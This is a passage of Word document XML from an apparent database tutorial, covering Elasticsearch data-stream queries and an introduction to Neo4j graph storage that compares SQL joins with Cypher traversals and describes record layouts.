        <w:t xml:space="preserve">  Automatically manages rolling indices (rollover when size/age threshold met)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C22AF61" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Alias-based querying: write to stream name, query all backing indices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEF388" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C17355" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  POST /logs-application-prod/_doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0372764C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  {  "@timestamp": "2024-01-15T10:30:45Z", ... }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59310318" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4850A67B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  GET /logs-application-prod/_search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F92B3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  { "query": {"range": {"@timestamp": {"gte": "now-1h"}}} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457BCAF2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392591A9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Behind the scenes: queries all backing indices (.ds-logs-application-prod-2024.01.15-000001, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151E1E0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="4D4FB8F1">
          <v:rect id="_x0000_i5961" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D533446" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part IV: Graph Databases — Neo4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0962D5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Graph Databases Actually Solve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F215387" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The engineering problem graph databases solve is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>relationship traversal complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> — the cost of following connections between entities when those connections are first-class data, not foreign-key references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8E4D31" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental algorithmic difference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A34210D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE4B7CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Social network: 1 million users, each with average 100 friends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C29A2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Query: "Find friends-of-friends-of-friends who are interested in jazz"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698616EC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>(3-hop traversal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A4B4D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="6997B491" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Relational approach (PostgreSQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF71895" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT DISTINCT u3.name, u3.interests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176FA46" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  FROM users u1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C29DE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  JOIN friendships f1 ON u1.id = f1.user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F0CB4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  JOIN users u2 ON f1.friend_id = u2.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E7342D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  JOIN friendships f2 ON u2.id = f2.user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC97391" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  JOIN users u3 ON f2.friend_id = u3.id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11637DFC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  JOIN friendships f3 ON u3.id = f3.user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4ED36" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WHERE u1.id = 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D0117" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    AND 'jazz' = ANY(u3.interests);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CFAC57" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B136F67" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Each JOIN is an O(N) operation against the friendships table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A5AE8A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  At depth 3: potentially 100 × 100 × 100 = 1,000,000 candidate paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4625C218" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Even with indexes, the index lookup + join execution for 1M rows is expensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193E404" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119F4A5E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Performance at depth 6 (six degrees of separation): intractable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4B49E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  1M^6 candidates = 10^36 (requires aggressive pruning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1DB48" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Real social networks: 6-hop queries in PostgreSQL take hours or fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C061060" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAF2E0F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Neo4j approach (native graph):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E86C09A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  MATCH (u1:User {id: 12345})-[:FRIEND*3]-&gt;(u3:User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5297B4E7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WHERE 'jazz' IN u3.interests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103DD68" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  RETURN DISTINCT u3.name, u3.interests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C51B04E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E56BCA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Traversal algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0064FADB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Start at node u1 (direct pointer lookup — O(1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF84833" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Follow FRIEND edges to u1's neighbors (follow pointers in adjacency list — O(degree))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF69F8D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Follow FRIEND edges from each neighbor (O(degree) per node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53AFF9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Follow FRIEND edges from each of those (O(degree) per node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2892D5CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Filter by jazz interest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420D3FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A718BCC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Performance characteristic: O(|traversed_edges|) — linear in the graph traversal size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110CC064" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Does NOT depend on total graph size (1M users vs 1B users makes no difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313D8768" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  if the traversal reaches the same number of nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20807AC6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2B72C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  6-hop query in Neo4j: milliseconds to seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A0A7F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  6-hop query in PostgreSQL: minutes to impossible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6421792F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Neo4j's Native Graph Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7332F21D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What "native graph storage" means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F2DE9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11025D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Non-native graph storage (graph API on top of relational):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D945E8A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Nodes → stored as rows in "nodes" table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFB82D1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Edges → stored as rows in "edges" table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6459F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Traversal → SQL JOIN on edges table per hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39B95B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Performance: degrades as O(N) per hop regardless of graph structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A88B4AB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1987F172" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Native graph storage (Neo4j):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F46566B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Nodes and relationships are first-class storage structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186DFC99" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Relationships are physical pointers, not indexed references</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E803620" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A93A79" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node record (fixed 15 bytes in Neo4j's store format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22350D6C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    in_use:           1 byte  (is this record active?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6850BD6D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    next_rel_id:      4 bytes (pointer to first relationship of this node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FEC97" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    next_prop_id:     4 bytes (pointer to first property of this node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A44F92" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    labels:           4 bytes (label store pointer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D717B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    extra:            2 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41471C34" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6011CA49" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Relationship record (fixed 34 bytes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A32BB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    in_use:           1 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C8EC1A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    first_node:       4 bytes (start node pointer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541675D0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    second_node:      4 bytes (end node pointer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB29AA1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    relationship_type: 4 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE30C2B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    first_node_prev_rel: 4 bytes (linked list: prev rel for start node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356CD3A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    first_node_next_rel: 4 bytes (linked list: next rel for start node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540BEA6F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    second_node_prev_rel:4 bytes (linked list: prev rel for end node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D7F49" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    second_node_next_rel:4 bytes (linked list: next rel for end node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347900FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    next_prop_id:     4 bytes (pointer to relationship's properties)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127D236" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB83577" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Fixed-size records: O(1) lookup by ID (record_id × record_size = file_offset)</w:t>
      </w:r>
    </w:p>
